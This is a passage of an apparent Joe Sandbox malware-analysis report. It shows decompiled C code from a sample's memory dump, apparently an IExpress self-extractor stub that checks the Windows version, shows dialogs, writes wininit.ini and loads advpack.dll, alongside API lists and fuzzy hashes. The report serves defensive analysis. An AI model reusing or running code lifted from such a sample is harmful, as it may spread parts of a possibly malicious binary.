                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 9f49432fdde08cfdd97dc6960ce0fe646dfaef9f1b99fd40cbbf4a698e9e4f88
                                                                                                                                                                                                      • Instruction ID: 40939f5608e5c4942cdef8b395469421751f262956e5c09880bd9652438916ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f49432fdde08cfdd97dc6960ce0fe646dfaef9f1b99fd40cbbf4a698e9e4f88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED01B5326002186BD720DB669C0CEDFBBBDEB85750F044565FA4DF3190DE748E89CA91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00E736EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xe78184 = 1;
                                                                                                                                                                                                      						 *0xe78180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xe79a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xe78a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E00E72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E00E72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe78a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0xe78a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E00E7681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E00E767C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E00E728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xe79a40 = _t119;
                                                                                                                                                                                                      						 *0xe78184 = 1;
                                                                                                                                                                                                      						 *0xe78180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xe79a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe78184 = _t135;
                                                                                                                                                                                                      							 *0xe78180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E00E744B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E00E76CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738f2
                                                                                                                                                                                                      0x00e73843
                                                                                                                                                                                                      0x00e73845
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7384b
                                                                                                                                                                                                      0x00e7384d
                                                                                                                                                                                                      0x00e73883
                                                                                                                                                                                                      0x00e73885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7389a
                                                                                                                                                                                                      0x00e7389e
                                                                                                                                                                                                      0x00e7389e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a0
                                                                                                                                                                                                      0x00e738a0
                                                                                                                                                                                                      0x00e738a2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738a4
                                                                                                                                                                                                      0x00e7384f
                                                                                                                                                                                                      0x00e73851
                                                                                                                                                                                                      0x00e73857
                                                                                                                                                                                                      0x00e7386e
                                                                                                                                                                                                      0x00e73877
                                                                                                                                                                                                      0x00e7387b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73881
                                                                                                                                                                                                      0x00e73859
                                                                                                                                                                                                      0x00e7385c
                                                                                                                                                                                                      0x00e73862
                                                                                                                                                                                                      0x00e73866
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73868
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e738f4
                                                                                                                                                                                                      0x00e738f4
                                                                                                                                                                                                      0x00e738f5
                                                                                                                                                                                                      0x00e738fb
                                                                                                                                                                                                      0x00e73901
                                                                                                                                                                                                      0x00e73901
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7390a
                                                                                                                                                                                                      0x00e7374b
                                                                                                                                                                                                      0x00e7374e
                                                                                                                                                                                                      0x00e7375c
                                                                                                                                                                                                      0x00e73764
                                                                                                                                                                                                      0x00e73769
                                                                                                                                                                                                      0x00e7376e
                                                                                                                                                                                                      0x00e73771
                                                                                                                                                                                                      0x00e7379c
                                                                                                                                                                                                      0x00e7379f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737a3
                                                                                                                                                                                                      0x00e737a4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e737a4
                                                                                                                                                                                                      0x00e73773
                                                                                                                                                                                                      0x00e73777
                                                                                                                                                                                                      0x00e73778
                                                                                                                                                                                                      0x00e7377f
                                                                                                                                                                                                      0x00e73781
                                                                                                                                                                                                      0x00e7378e
                                                                                                                                                                                                      0x00e7378e
                                                                                                                                                                                                      0x00e73794
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73794
                                                                                                                                                                                                      0x00e73783
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73785
                                                                                                                                                                                                      0x00e7378c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7378c
                                                                                                                                                                                                      0x00e73750
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7372d
                                                                                                                                                                                                      0x00e7372d
                                                                                                                                                                                                      0x00e7396b
                                                                                                                                                                                                      0x00e7396b
                                                                                                                                                                                                      0x00e7396c
                                                                                                                                                                                                      0x00e7396e
                                                                                                                                                                                                      0x00e7396f
                                                                                                                                                                                                      0x00e73a1e
                                                                                                                                                                                                      0x00e73a1e
                                                                                                                                                                                                      0x00e73a22
                                                                                                                                                                                                      0x00e73a27
                                                                                                                                                                                                      0x00e73a3e
                                                                                                                                                                                                      0x00e73a3e

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00E73723
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00E739C3
                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00E739F1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$BeepVersion
                                                                                                                                                                                                      • String ID: 3$cent
                                                                                                                                                                                                      • API String ID: 2519184315-3438608206
                                                                                                                                                                                                      • Opcode ID: 476fdefc1b0c2c45e71f22b187fb67f08b3cfb8cb4d1868d2ac1f0079a976802
                                                                                                                                                                                                      • Instruction ID: ca819fc4c658403e2bbd5b4ea67bd8a4e1d3df6940e1d0af56459cc25a30d4b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476fdefc1b0c2c45e71f22b187fb67f08b3cfb8cb4d1868d2ac1f0079a976802
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56910771A012159FEBB8CB35CD817EA73B0EB85308F1590AAD94DB7295D7708F81EB01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                                      			E00E76517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xe79a3c; // 0xe70000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E00E744B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t5 =  &_a16; // 0xe72ee8
                                                                                                                                                                                                      					_t24 =  *_t5;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                      • API String ID: 1214682469-1603360339
                                                                                                                                                                                                      • Opcode ID: 99bd320feec59af0dbe714acbb4a04e52f1fb97d8d2dbcafa9ac365e67a3e649
                                                                                                                                                                                                      • Instruction ID: 1715147a363d770be4d996cd9319f91e6bf3c12782c7e35e5d221b1987f7b408
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99bd320feec59af0dbe714acbb4a04e52f1fb97d8d2dbcafa9ac365e67a3e649
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79012672100A05BFDB109F6A9C08DBB7A6CEBC5769F084525FE18B3194D7718C50EAA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E00E76495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E00E71781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E00E7658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E764DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E764F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E76502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
